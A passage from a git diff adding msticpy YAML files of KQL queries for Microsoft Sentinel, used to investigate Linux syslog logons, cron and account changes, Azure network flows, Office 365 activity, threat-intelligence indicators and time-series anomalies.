+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer has "{host_name}"
+        | where ProcessName == "CRON" or Facility == "cron"
+        | extend CMD=extract("CMD(.*)",1,SyslogMessage), User=extract("for user ([[:alpha:]]*)",1,SyslogMessage), CronUser=extract("^[(]([[:alpha:]]*)",1,SyslogMessage),EditStatus=extract("[A-Z]+ EDIT",0,SyslogMessage)
+        {add_query_items}'
+    parameters:
+  user_group_activity:
+    description: All user/group additions, deletions, and modifications
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer has "{host_name}"
+        | where Facility == "authpriv"
+        | extend UserGroupAction = iif((ProcessName == "groupadd" or ProcessName == "useradd") and (SyslogMessage contains "new group" or SyslogMessage contains "new user"), "Add",
+                                    iif((ProcessName == "groupdel" or ProcessName == "userdel") and (SyslogMessage contains "delete user" or SyslogMessage matches regex "(removed group|removed$)"), "Delete",
+                                    iif(ProcessName == "usermod" or ProcessName == "gpasswd", "Modify", "")
+                                        )
+                                    )
+        | extend User=extract("(user: name=|user '')([[:alnum:]]+)",2,SyslogMessage), Group=extract("(group: name=|group '')([[:alnum:]]+)",2,SyslogMessage), UID=extract("UID=([0-9]+)",1,SyslogMessage), GID=extract("GID=([0-9]+)",1,SyslogMessage)
+        | where UserGroupAction != ""
+        {add_query_items}'
+    parameters:
+  all_syslog:
+    description: Returns all syslog activity for a host
+    args:
+      query: '
+         {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer has "{host_name}"
+        {add_query_items}'
+    parameters:
+
diff --git a/msticpy/data/queries/kql_sent_lxsyslog_apps.yaml b/msticpy/data/queries/kql_sent_lxsyslog_apps.yaml
new file mode 100644
index 000000000..ec4c9904f
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_lxsyslog_apps.yaml
@@ -0,0 +1,71 @@
+metadata:
+  version: 1
+  description: Linux Syslog Application Queries
+  data_environments: [LogAnalytics]
+  data_families: [LinuxSyslog]
+  tags: ['linux', 'syslog', 'application']
+defaults:
+  metadata:
+    data_source: 'linux_syslog'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'Syslog'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project
+            TenantId,
+            Computer,
+            Facility,
+            TimeGenerated,
+            HostName,
+            SeverityLevel,
+            SyslogMessage,
+            ProcessID,
+            ProcessName,
+            HostIP,
+          | extend TimeCreatedUtc=TimeGenerated'
+sources:
+  squid_activity:
+    description: All squid proxy activity
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer == "{host_name}"
+        | where ProcessName contains "squid"
+        | extend URL = extract("(CONNECT |GET )([^ ]*)",2,SyslogMessage),
+          SourceIP = extract("([0-9]+ )(([0-9]|[0-9][0-9]|[0-9][0-9][0-9])\\.([0-9]|[0-9][0-9]|[0-9][0-9][0-9])\\.([0-9]|[0-9][0-9]|[0-9][0-9][0-9])\\.([0-9]|[0-9][0-9]|[0-9][0-9][0-9]))",2,SyslogMessage),
+          Status = extract("(TCP_(([A-Z]+)(_[A-Z]+)*)|UDP_(([A-Z]+)(_[A-Z]+)*))",1,SyslogMessage),
+          HTTP_Status_Code = extract("(TCP_(([A-Z]+)(_[A-Z]+)*)|UDP_(([A-Z]+)(_[A-Z]+)*))/([0-9][0-9][0-9])",8,SyslogMessage),
+          User = extract("(CONNECT |GET )([^ ]* )([^ ]+)",3,SyslogMessage)
+        | where URL != ""
+        | where User contains "{user}"'
+    parameters:
+      host_name:
+        description: Hostname to query for
+        type: str
+      user:
+        description: Username to filter the search by
+        type: str
+        default: ''
+
diff --git a/msticpy/data/queries/kql_sent_lxsyslog_logon.yaml b/msticpy/data/queries/kql_sent_lxsyslog_logon.yaml
new file mode 100644
index 000000000..fed5eabb0
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_lxsyslog_logon.yaml
@@ -0,0 +1,312 @@
+metadata:
+  version: 1
+  description: Linux Syslog Logon Data Queries
+  data_environments: [LogAnalytics]
+  data_families: [LinuxSyslog]
+  tags: ["linux", "syslog"]
+  aliases: &logon_failures '
+    {table}
+    | where {subscription_filter}
+    | where TimeGenerated >= datetime({start})
+    | where TimeGenerated <= datetime({end})
+    $<query_condition>$
+    | where Facility in ("auth", "authpriv")
+    and ProcessName != "CRON" and ProcessName != "sudo"
+    | where (SyslogMessage contains "failure"
+    or SyslogMessage contains "invalid"
+    or SyslogMessage contains "Unable to negotiate"
+    or SyslogMessage contains "authentication failures"
+    or SyslogMessage contains "Did not receive identification"
+    or SyslogMessage contains " Bad protocol version identification"
+    or SyslogMessage matches regex "^Connection closed .* [preauth]")
+    or (Facility == "authpriv" and ProcessName == "su"
+    and SyslogMessage contains "FAILED" and SyslogMessage !contains "pam_")
+    | extend
+    User = iif(SyslogMessage contains "publickey",
+    extract("(for )([[:alnum:]]+)", 2, SyslogMessage),
+    extract("(user |user=)([[:alnum:]]+)",2,SyslogMessage)),
+    LogonType = strcat(extract("Accepted\\s+([^\\s]+)", 1, SyslogMessage),
+    " (", ProcessName, ")"),
+    SourceIP = extract("((?:[0-9]{{1,3}}\\.){{3}}[0-9]{{1,3}})", 1, SyslogMessage),
+    SourcePort = extract("port ([0-9]+)", 1, SyslogMessage),
+    UID = extract("uid=([0-9]+)", 1, SyslogMessage)
+    {add_query_items}'
+defaults:
+  metadata:
+    data_source: "linux_syslog"
+  parameters:
+    table:
+      description: Table name
+      type: str
+      default: "Syslog"
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ""
+    subscription_filter:
+      description: Optional subscription/tenant filter expression
+      type: str
+      default: "true"
+    query_project:
+      description: Column project statement
+      type: str
+      default: "
+        | project
+        TenantId,
+        Computer,
+        Facility,
+        TimeGenerated,
+        HostName,
+        SeverityLevel,
+        SyslogMessage,
+        ProcessID,
+        ProcessName,
+        HostIP,
+        | extend TimeCreatedUtc=TimeGenerated"
+sources:
+  user_logon:
+    description: All user logon events on a host
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer has "{host_name}"
+        | where Facility == "auth" or Facility == "authpriv"
+        | where ProcessName != "sudo" and ProcessName != "CRON"
+        | extend LogonResult = iif(
+        (SyslogMessage contains "failure"
+        or SyslogMessage contains "invalid"
+        or SyslogMessage contains "Unable to negotiate"
+        or SyslogMessage contains "authentication failures"
+        or SyslogMessage contains "Did not receive identification"
+        or SyslogMessage contains " Bad protocol version identification"
+        or SyslogMessage matches regex "^Connection closed .* [preauth]")
+        or (Facility == "authpriv" and ProcessName == "su"
+        and SyslogMessage contains "FAILED" and SyslogMessage !contains "pam_"),
+        "Failure",
+        iif(
+        SyslogMessage contains "Accepted" or
+        (ProcessName == "su" and SyslogMessage contains "Successful"),
+        "Success", "Unknown"
+        )
+        )
+        | extend
+        User = iif(SyslogMessage contains "publickey",
+        extract("(for )([[:alnum:]]+)", 2, SyslogMessage),
+        extract("(user |user=)([[:alnum:]]+)",2,SyslogMessage)),
+        LogonType = strcat(extract("Accepted\\s+([^\\s]+)", 1, SyslogMessage),
+        " (", ProcessName, ")"),
+        SourceIP = extract("((?:[0-9]{{1,3}}\\.){{3}}[0-9]{{1,3}})", 1, SyslogMessage),
+        SourcePort = extract("port ([0-9]+)",1,SyslogMessage),
+        UID = extract("uid=([0-9]+)",1,SyslogMessage),
+        SourceUser = extract("(by |ruser=)([a-z_][a-z0-9_]*)",2, SyslogMessage)
+        | extend AccountName = User
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Hostname to query for
+        type: str
+  list_logons_for_account:
+    description: All successful user logon events for account (all hosts)
+    metadata:
+      pivot:
+        short_name: logons
+        direct_func_entities:
+          - Account
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Facility in ("auth", "authpriv")
+        and ProcessName != "CRON" and ProcessName != "sudo"
+        | where SyslogMessage has "{account_name}"
+        | where SyslogMessage startswith "Accepted"
+        | extend mssg_strings = split(SyslogMessage, " ")
+        | mvexpand mssg_item=mssg_strings
+        | extend mssg_item = tostring(mssg_item)
+        | extend AccountName = trim("\\.", mssg_item)
+        | extend User = AccountName
+        | where User has "{account_name}"
+        | project-away mssg_strings, mssg_item
+        | distinct *
+        | extend LogonResult = iif(
+        SyslogMessage contains "Accepted" or
+        (ProcessName == "su" and SyslogMessage contains "Successful"),
+        "Success",
+        iif(
+        (SyslogMessage contains "failure"
+        or SyslogMessage contains "invalid"
+        or SyslogMessage contains "Unable to negotiate"
+        or SyslogMessage contains "authentication failures"
+        or SyslogMessage contains "Did not receive identification"
+        or SyslogMessage contains " Bad protocol version identification"
+        or SyslogMessage matches regex "^Connection closed .* [preauth]")
+        or (Facility == "authpriv" and ProcessName == "su"
+        and SyslogMessage contains "FAILED" and SyslogMessage !contains "pam_"),
+        "Failure", "Unknown"
+        )
+        )
+        | extend
+        LogonType = strcat(extract("Accepted\\s+([^\\s]+)", 1, SyslogMessage),
+        " (", ProcessName, ")"),
+        SourceIP = extract("((?:[0-9]{{1,3}}\\.){{3}}[0-9]{{1,3}})", 1, SyslogMessage),
+        SourcePort = extract("port ([0-9]+)", 1, SyslogMessage),
+        UID = extract("uid=([0-9]+)", 1, SyslogMessage)
+        {add_query_items}'
+    parameters:
+      account_name:
+        description: The account name to search on
+        type: str
+  list_logons_for_source_ip:
+    description: All successful user logon events for source IP (all hosts)
+    metadata:
+      pivot:
+        short_name: logons
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Facility in ("auth", "authpriv")
+        and ProcessName != "CRON" and ProcessName != "sudo"
+        | where SyslogMessage has "{ip_address}"
+        | where SyslogMessage startswith "Accepted"
+        | extend
+        User = iif(SyslogMessage contains "publickey",
+        extract("(for )([[:alnum:]]+)", 2, SyslogMessage),
+        extract("(user |user=)([[:alnum:]]+)",2,SyslogMessage)),
+        LogonType = strcat(extract("Accepted\\s+([^\\s]+)", 1, SyslogMessage),
+        " (", ProcessName, ")"),
+        SourceIP = extract("((?:[0-9]{{1,3}}\\.){{3}}[0-9]{{1,3}})", 1, SyslogMessage),
+        SourcePort = extract("port ([0-9]+)", 1, SyslogMessage),
+        UID = extract("uid=([0-9]+)", 1, SyslogMessage)
+        | extend AccountName = User
+        {add_query_items}'
+    parameters:
+      ip_address:
+        description: The source IP Address to search on
+        type: str
+  list_logons_for_host:
+    description: All logon events on a host
+    metadata:
+      pivot:
+        short_name: logons
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer has "{host_name}"
+        | where Facility == "auth" or Facility == "authpriv"
+        | where ProcessName != "sudo" and ProcessName != "CRON"
+        | extend LogonResult = iif(
+        (SyslogMessage contains "failure"
+        or SyslogMessage contains "invalid"
+        or SyslogMessage contains "Unable to negotiate"
+        or SyslogMessage contains "authentication failures"
+        or SyslogMessage contains "Did not receive identification"
+        or SyslogMessage contains " Bad protocol version identification"
+        or SyslogMessage matches regex "^Connection closed .* [preauth]")
+        or (Facility == "authpriv" and ProcessName == "su"
+        and SyslogMessage contains "FAILED" and SyslogMessage !contains "pam_"),
+        "Failure",
+        iif(
+        SyslogMessage contains "Accepted" or
+        (ProcessName == "su" and SyslogMessage contains "Successful"),
+        "Success", "Unknown"
+        )
+        )
+        | extend
+        User = iif(SyslogMessage contains "publickey",
+        extract("(for )([[:alnum:]]+)", 2, SyslogMessage),
+        extract("(user |user=)([[:alnum:]]+)",2,SyslogMessage)),
+        LogonType = strcat(extract("Accepted\\s+([^\\s]+)", 1, SyslogMessage),
+        " (", ProcessName, ")"),
+        SourceIP = extract("((?:[0-9]{{1,3}}\\.){{3}}[0-9]{{1,3}})", 1, SyslogMessage),
+        SourcePort = extract("port ([0-9]+)",1,SyslogMessage),
+        UID = extract("uid=([0-9]+)",1,SyslogMessage),
+        SourceUser = extract("(by |ruser=)([a-z_][a-z0-9_]*)",2, SyslogMessage)
+        | extend Account = User
+        | extend LogonTypeName = ProcessName
+        | extend LogonProcessName = ProcessName
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Hostname to query for
+        type: str
+  list_host_logon_failures:
+    description: All failed user logon events on a host
+    metadata:
+      pivot:
+        short_name: logon_failures
+        direct_func_entities:
+          - Host
+    args:
+      query: *logon_failures
+    parameters:
+      host_name:
+        description: Hostname to query for
+        type: str
+    query_macros:
+      query_condition:
+        description: Hostname where clause
+        value: '| where Computer has "{host_name}"'
+  list_ip_logon_failures:
+    description: All failed user logon events from an IP address
+    metadata:
+      pivot:
+        short_name: logon_failures
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: *logon_failures
+    parameters:
+      ip_address:
+        description: Ip Address to query for
+        type: str
+    query_macros:
+      query_condition:
+        description: IP Address where clause
+        value: '| where SyslogMessage has "{ip_address}"'
+  list_account_logon_failures:
+    description: All failed user logon events from an IP address
+    metadata:
+      pivot:
+        short_name: logon_failures
+        direct_func_entities:
+          - Account
+    args:
+      query: *logon_failures
+    parameters:
+      account_name:
+        description: The account name to search on
+        type: str
+    query_macros:
+      query_condition:
+        description: Account where clause
+        value: '| where SyslogMessage has "{account_name}"'
+  list_logon_failures:
+    description: All failed user logon events on any host
+    args:
+      query: *logon_failures
+    parameters:
+    query_macros:
+      query_condition:
+        description: Null where clause
+        value: ""
diff --git a/msticpy/data/queries/kql_sent_net.yaml b/msticpy/data/queries/kql_sent_net.yaml
new file mode 100644
index 000000000..9b36b28aa
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_net.yaml
@@ -0,0 +1,211 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Network Queries
+  data_environments: [LogAnalytics]
+  data_families: [AzureNetwork, Network]
+  tags: ['network', 'heartbeat']
+  aliases:
+    - &azure_network_project '| project TenantId, TimeGenerated,
+        FlowStartTime = FlowStartTime_t,
+        FlowEndTime = FlowEndTime_t,
+        FlowIntervalEndTime = FlowIntervalEndTime_t,
+        FlowType = FlowType_s,
+        ResourceGroup = split(VM_s, "/")[0],
+        VMName = split(VM_s, "/")[1],
+        VMIPAddress = VMIP_s,
+        PublicIPs = extractall(@"([\d\.]+)[|\d]+", dynamic([1]), PublicIPs_s),
+        SrcIP = SrcIP_s,
+        DestIP = DestIP_s,
+        ExtIP = iif(FlowDirection_s == "I", SrcIP_s, DestIP_s),
+        L4Protocol = L4Protocol_s,
+        L7Protocol = L7Protocol_s,
+        DestPort = DestPort_d,
+        FlowDirection = FlowDirection_s,
+        AllowedOutFlows = AllowedOutFlows_d,
+        AllowedInFlows = AllowedInFlows_d,
+        DeniedInFlows = DeniedInFlows_d,
+        DeniedOutFlows = DeniedOutFlows_d,
+        RemoteRegion = AzureRegion_s,
+        VMRegion = Region_s'
+    - &azure_network_base_query '
+        {table}
+        | where SubType_s == "FlowLog"
+        | where FlowStartTime_t >= datetime({start})
+        | where FlowEndTime_t <= datetime({end})
+        $<query_condition>$
+        | where (AllowedOutFlows_d > 0 or AllowedInFlows_d > 0)
+        {query_project}
+        | extend AllExtIPs = iif(isempty(PublicIPs), pack_array(ExtIP),
+                         iif(isempty(ExtIP), PublicIPs, array_concat(PublicIPs, pack_array(ExtIP)))
+                         )
+        | project-away ExtIP
+        | mvexpand AllExtIPs
+        {add_query_items}'
+defaults:
+  metadata:
+    data_source: 'network'
+  parameters:
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ''
+sources:
+  get_ips_for_host:
+    description: Gets the latest AzureNetworkAnalytics interface event for a host.
+    metadata:
+      pivot:
+        short_name: interface
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        {table}
+        | where VirtualMachine_s has "{host_name}"
+        | where ResourceType == "NetworkInterface"
+        | top 1 by TimeGenerated desc
+        | project-rename PrivateIPAddresses = PrivateIPAddresses_s,
+        PublicIPAddresses = PublicIPAddresses_s
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      table:
+        description: Table name
+        type: str
+        default: AzureNetworkAnalytics_CL
+  get_host_for_ip:
+    description: Gets the latest AzureNetworkAnalytics interface event for a host.
+    metadata:
+      pivot:
+        short_name: interface
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: '
+        {table}
+        | where PrivateIPAddresses_s has "{ip_address}"
+          or PublicIPAddresses_s has "{ip_address}"
+        | where ResourceType == "NetworkInterface"
+        | top 1 by TimeGenerated desc
+        | project-rename PrivateIPAddresses = PrivateIPAddresses_s,
+        PublicIPAddresses = PublicIPAddresses_s, VirtualMachine = VirtualMachine_s
+        | extend Computer = split(VirtualMachine, "/")[-1]
+        {add_query_items}'
+    parameters:
+      ip_address:
+        description: IP Address
+        type: str
+      table:
+        description: Table name
+        type: str
+        default: AzureNetworkAnalytics_CL
+  get_heartbeat_for_host:
+    description: Retrieves latest OMS Heartbeat event for host.
+    metadata:
+      data_families: [AzureNetwork, Network, Heartbeat]
+      pivot:
+        short_name: heartbeat
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        {table}
+        | where Computer has "{host_name}"
+        | top 1 by TimeGenerated desc nulls last
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      table:
+        description: Table name
+        type: str
+        default: Heartbeat
+  get_heartbeat_for_ip:
+    description: Retrieves latest OMS Heartbeat event for ip address.
+    metadata:
+      data_families: [AzureNetwork, Network, Heartbeat]
+      pivot:
+        short_name: heartbeat
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: '
+        {table}
+        | where ComputerIP == "{ip_address}"
+        | top 1 by TimeGenerated desc nulls last
+        {add_query_items}'
+    parameters:
+      ip_address:
+        description: IP Address
+        type: str
+      table:
+        description: Table name
+        type: str
+        default: Heartbeat
+  list_azure_network_flows_by_ip:
+    description: Retrieves Azure network analytics flow events.
+    metadata:
+      pivot:
+        short_name: net_flows
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: *azure_network_base_query
+    parameters:
+      query_project:
+        description: Column project statement
+        type: str
+        default: *azure_network_project
+      ip_address_list:
+        description: Column project statement
+        type: list
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      table:
+        description: Table name
+        type: str
+        default: AzureNetworkAnalytics_CL
+    query_macros:
+      query_condition:
+        description: Query-specific where clause
+        value: '| where (VMIP_s in ({ip_address_list})
+           or SrcIP_s in ({ip_address_list})
+           or DestIP_s in ({ip_address_list})
+          )'
+  list_azure_network_flows_by_host:
+    description: Retrieves Azure network analytics flow events.
+    metadata:
+      pivot:
+        short_name: net_flows
+        direct_func_entities:
+          - Host
+    args:
+      query: *azure_network_base_query
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      query_project:
+        description: Column project statement
+        type: str
+        default: *azure_network_project
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      table:
+        description: Table name
+        type: str
+        default: AzureNetworkAnalytics_CL
+    query_macros:
+      query_condition:
+        description: Query-specific where clause
+        value: '| where VM_s has "{host_name}"'
\ No newline at end of file
diff --git a/msticpy/data/queries/kql_sent_o365.yaml b/msticpy/data/queries/kql_sent_o365.yaml
new file mode 100644
index 000000000..eca1da6b6
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_o365.yaml
@@ -0,0 +1,96 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Azure
+  data_environments: [LogAnalytics]
+  data_families: [Office365]
+  tags: ['office', 'o365']
+defaults:
+  metadata:
+    data_source: 'OfficeActivity'
+  parameters:
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+sources:
+  list_activity_for_account:
+    description: Lists Office Activity for Account
+    metadata:
+      pivot:
+        short_name: activity
+        direct_func_entities:
+          - Account
+    args:
+      query: '
+        let accountName = "{account_name}";
+        let account = case(
+            accountName has "@", tostring(split(accountName, "@")[0]),
+            accountName has "\\", tostring(split(accountName, "\\")[1]),
+            accountName
+        );
+        {table}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where UserId has accountName
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: OfficeActivity
+      account_name:
+        description: The account name to find
+        type: str
+  list_activity_for_ip:
+    description: Lists Office Activity for Caller IP Address(es)
+    metadata:
+      pivot:
+        short_name: activity
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: '
+        {table}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where ClientIP in ({ip_address_list})
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: OfficeActivity
+      ip_address_list:
+        description: The IP Address or list of Addresses
+        type: list
+  list_activity_for_resource:
+    description: Lists Office Activity for a Resource
+    metadata:
+      pivot:
+        short_name: activity
+        direct_func_entities:
+          - AzureResource
+    args:
+      query: '
+        {table}
+        | where OfficeObjectId has "{resource_id}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: OfficeActivity
+      resource_id:
+        description: OfficeObjectId or substring
+        type: str
+        aliases:
+          - resource
+
diff --git a/msticpy/data/queries/kql_sent_threatintel.yaml b/msticpy/data/queries/kql_sent_threatintel.yaml
new file mode 100644
index 000000000..652599fb2
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_threatintel.yaml
@@ -0,0 +1,173 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Threat Indicator Queries
+  data_environments: [LogAnalytics]
+  data_families: [ThreatIntelligence]
+  tags: ['threatintel', 'indicator', 'TI', 'ioc']
+defaults:
+  metadata:
+    data_source: 'threat_intel'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'ThreatIntelligenceIndicator'
+      query_project:
+        description: Project clause to limit/change return column names
+        type: str
+        default: ''
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+sources:
+  list_indicators:
+    description: Retrieves list of all current indicators.
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | summarize arg_max(TimeGenerated, *) by IndicatorId
+        {add_query_items}'
+      uri: None
+    parameters:
+  list_indicators_by_ip:
+    description: Retrieves list of indicators by IP Address
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where NetworkIP in ({ip_address_list})
+          or NetworkDestinationIP in ({ip_address_list})
+          or NetworkSourceIP in ({ip_address_list})
+          or EmailSourceIpAddress in ({ip_address_list})
+        | extend IoC = tolower(
+            iff(isnotempty(NetworkIP) and NetworkIP in ({ip_address_list}), NetworkIP,
+              iff(isnotempty(NetworkDestinationIP) and NetworkDestinationIP in ({ip_address_list}), NetworkDestinationIP,
+                iff(isnotempty(NetworkSourceIP) and NetworkSourceIP in ({ip_address_list}), NetworkSourceIP,
+                  iff(isnotempty(EmailSourceIpAddress) and EmailSourceIpAddress in ({ip_address_list}), EmailSourceIpAddress, "")
+                  )
+                )
+              )
+            )
+        | summarize arg_max(TimeGenerated, *) by IndicatorId
+        {add_query_items}'
+    parameters:
+      ip_address_list:
+        description: Ip Address to query for
+        type: list
+        aliases:
+          - observables
+  list_indicators_by_hash:
+    description: Retrieves list of indicators by file hash
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where FileHashValue in~ ({file_hash_list})
+        | extend IoC = tolower(FileHashValue)
+        | summarize arg_max(TimeGenerated, *) by IndicatorId
+        {add_query_items}'
+    parameters:
+      file_hash_list:
+        description: File hash(es) to query for
+        type: list
+        aliases:
+          - observables
+  list_indicators_by_filepath:
+    description: Retrieves list of indicators by file path
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where FilePath in~ ({observables})
+        | extend IoC = tolower(FilePath)
+        | summarize arg_max(TimeGenerated, *) by IndicatorId
+        {add_query_items}'
+    parameters:
+      observables:
+        description: List of observables
+        type: list
+  list_indicators_by_domain:
+    description: Retrieves list of indicators by domain
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where DomainName in~ ({domain_list})
+          or EmailSourceDomain in~ ({domain_list})
+        | extend IoC = tolower(
+            iff(isnotempty(DomainName) and DomainName in~ ({domain_list}), DomainName,
+              iff(isnotempty(EmailSourceDomain) and EmailSourceDomain in~ ({domain_list}), EmailSourceDomain, "")
+              )
+            )
+        | summarize arg_max(TimeGenerated, *) by IndicatorId
+        {add_query_items}'
+    parameters:
+      domain_list:
+        description: Domain(s) to query for
+        type: list
+        aliases:
+          - observables
+  list_indicators_by_email:
+    description: Retrieves list of indicators by email address
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where EmailRecipient in~ ({observables})
+          or EmailSenderAddress in~ ({observables})
+        | extend IoC = tolower(
+            iff(isnotempty(EmailRecipient) and EmailRecipient in~ ({observables}), EmailRecipient,
+              iff(isnotempty(EmailSenderAddress) and EmailSenderAddress in~ ({observables}), EmailSenderAddress, "")
+              )
+            )
+        | summarize arg_max(TimeGenerated, *) by IndicatorId
+        {add_query_items}'
+    parameters:
+      observables:
+        description: List of observables
+        type: list
+  list_indicators_by_url:
+    description: Retrieves list of indicators by URL
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Url in~ ({url_list})
+        | extend IoC = tolower(Url)
+        | summarize arg_max(TimeGenerated, *) by IndicatorId
+        {add_query_items}'
+    parameters:
+      url_list:
+        description: URL(s) to query for
+        type: list
+        aliases:
+          - observables
diff --git a/msticpy/data/queries/kql_sent_timeseries.yaml b/msticpy/data/queries/kql_sent_timeseries.yaml
new file mode 100644
index 000000000..a67898e46
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_timeseries.yaml
@@ -0,0 +1,118 @@
+metadata:
+  version: 1
+  description: TimeSeries - Series of TimeSeries queries for variety of Data Sources
+  data_environments: [LogAnalytics]
+  data_families: ['MultiDataSource']
+  tags: ['TimeSeries','host','ip','alert','network']
+defaults:
+  parameters:
+      table:
+        description: Table name
+        type: str
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      timeframe:
+        description: Aggregation TimeFrame
+        type: str
+        default: '1h'
+      scorethreshold:
+        description: Score threshold for alerting
+        type: str
+        default: '3'
+      where_clause:
+        description: Optional additional filter clauses
+        type: str
+        default: ''
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: '' 
+      groupbycolumn:
+        description: Group by field to aggregate results
+        type: str
+        default: 'Type'
+      timestampcolumn:
+        description: Timestamp field to use from source dataset
+        type: str
+        default: 'TimeGenerated'
+      aggregatecolumn:
+        description: field to agregate from source dataset
+        type: str
+        default: 'Total'
+      aggregatefunction:
+        description: Aggregation functions to use - count(), sum(), avg() etc
+        type: str
+        default: 'count()'
+sources:
+  get_timeseries_data:
+    description: Retrieves TimeSeriesData prepared to use with built-in KQL time series functions
+    args:
+      query: '
+            {table}
+            {where_clause}
+            | project {timestampcolumn},{aggregatecolumn},{groupbycolumn}
+            | where {timestampcolumn} >= datetime({start})
+            | where {timestampcolumn} <= datetime({end})
+            | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn}
+            {add_query_items}'
+  get_timeseries_decompose:
+    description: Time Series decomposition and anomalies generated using built-in KQL time series function- series_decompose
+    args:
+      query: '
+            {table}
+            {where_clause}
+            | project {timestampcolumn},{aggregatecolumn},{groupbycolumn}
+            | where {timestampcolumn} >= datetime({start})
+            | where {timestampcolumn} <= datetime({end})
+            | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn}
+            | extend (baseline,seasonal,trend,residual) = series_decompose({aggregatecolumn})
+            | mv-expand {aggregatecolumn} to typeof(double), {timestampcolumn} to typeof(datetime), baseline to typeof(double), seasonal to typeof(double), trend to typeof(long), residual to typeof(long) 
+            {add_query_items}'  
+  get_timeseries_anomalies:
+    description: Time Series filtered anomalies detected using built-in KQL time series function-series_decompose_anomalies
+    args:
+      query: '
+            {table}
+            {where_clause}
+            | project {timestampcolumn},{aggregatecolumn},{groupbycolumn}
+            | where {timestampcolumn} >= datetime({start})
+            | where {timestampcolumn} <= datetime({end})
